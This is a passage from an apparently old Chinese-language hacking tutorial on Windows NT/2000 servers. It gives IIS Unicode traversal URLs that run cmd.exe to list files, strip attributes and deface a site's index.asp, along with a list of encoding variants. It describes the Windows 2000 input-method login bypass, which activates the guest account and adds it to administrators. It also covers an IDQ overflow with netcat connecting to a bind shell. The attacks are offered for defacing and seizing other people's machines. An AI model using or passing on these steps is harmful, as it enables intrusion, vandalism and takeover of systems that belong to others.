WINNT4File(s)1,156bytes
5Dir(s)2,461,421,568bytesfree
------------------------------
的目录列表。
也会碰到看不到文件的空目录。
好,我们成功看到了机器里的C盘了。
我们在浏览器里输入:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?
/c+set回车
CGIError
ThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:
ALLUSERSPROFILE=C:
\DocumentsandSettings\AllUsers
CommonProgramFiles=C:
\ProgramFiles\CommonFiles
COMPUTERNAME=ON
ComSpec=C:
\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=192.168.0.111
HTTP_USER_AGENT=Mozilla/4.0(compatible;MSIE6.0b;Windows98;Win9x4.90)
HTTP_ACCEPT_ENCODING=gzip,deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=192.168.0.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:
\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:
\WINNT\system32;C:
\WINNT;C:
\WINNT\System32\Wbem;C:
\MSSQL7\BINN
PATH_TRANSLATED=c:
\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86Fa
-----------------
哈,我们看到了机器设置内容了,我们找找,主要看PATH_TRANSLATED=c:
\inetpub\wwwroot
意思是他的主页存放在c:
\inetpub\wwwroot的目录里,知道就好办了。
我们用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?
/c+dir+c:
\inetpub\wwwroot回车
我们就可以看到c:
\inetpub\wwwroot目录里的文件了,一般都有default.asp,default.htm,index.htm,index.asp,等等。
我们以目录里有index.asp做例子。
我们先要做的是把文件的只读属性解除掉,很多管理员都把文件设置只读。
我们用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?
%20-r%20-h%20c:
\inetpub\wwwroot\index.asp回车
当看到下面的英文
CGIError
ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete
setofHTTPheaders.Theheadersitdidreturnare:
恭喜你,你可以改他的网页了。
----------------------------------------
但如果你看到下面的英文就不成功,只好换其他机器了。
CGIError
ThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:
Accessdenied-C:
\inetpub\wwwroot\index.asp
-----------------------------
继续。
现在用ECHO改网页的内容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?
/c+echo+网站有漏洞+>c:
\inetpub\wwwroot\index.asp回车
当看到
CGIError
ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete
setofHTTPheaders.Theheadersitdidreturnare:
的提示,你已经改了他的网页了,呵呵,你想改成什么字也行。
只要把命令中的中文换成你自己的中文就行了。
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe?
/c+dir+c:
\
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
WINNT4
/scripts/..%c1%9c../winnt/system32/cmd.exe
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe
通用代码:
/scripts/..%255c../winnt/system32/cmd.exe?
/c+dir+c:
\
(2)Windows2000输入法漏洞
先用端口扫描器扫描开放3389的机器,然后用终端客户端程序进行连接,用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠标右键。
选择“帮助”——“输入法指南”——“选项”。
(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。
)按右键,选择“跳转到URL”,输入:
c:
\winnt\system32在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性”—“目标”—c:
\winnt\system32\net.exe后面空一格,填入“userguest/active:
yes”。
点击“确定”(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。
(此时你不会看到运行状态,但guest用户已被激活。
)然后重复操作上面的,在“属性”——“目标”——c:
\winnt\system32\net.exe后面空一格,填入localgroupadministratorsguest/add(这一步骤目的是,利用“net.exe”将guest变成系统管理员。
)再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。
现在,我们可以像操作本地主机一样,控制对方系统。
(3)idq溢出漏洞
要用到3个程序,一个SnakeIISIDQ溢出程序GUI版本,一个扫描器,还有NC。
首先扫描一台有IDQ漏洞的机器,然后设置SnakeIISIDQ溢出程序,在被攻击IP地址后面写上对方的IP.端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813.不改了.用默认的,左面选择操作系统类型,随便选一个,我们选IIS5EnglishWin2kSp0吧,点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了,然后我们用NC来连接。
进入MS-DOS。
进入“nc”的目录。
然后:
nc--vIP813
c:
\>nc-vvIP813
IP:
inversehostlookupfailed:
h_errno11004:
NO_DATA
(UNKNOWN)[IP]813(?
):
connectionrefused
sent0,rcvd0:
NOTSOCK
c:
\>
看来没成功.别灰心,在来一次,换用IIS5EnglishWin2kSp1试试。
c:
\>nc-vvIP813
IP:
inversehostlookupfailed:
h_errno11004:
NO_DATA
(UNKNOWN)[IP]813(?
)open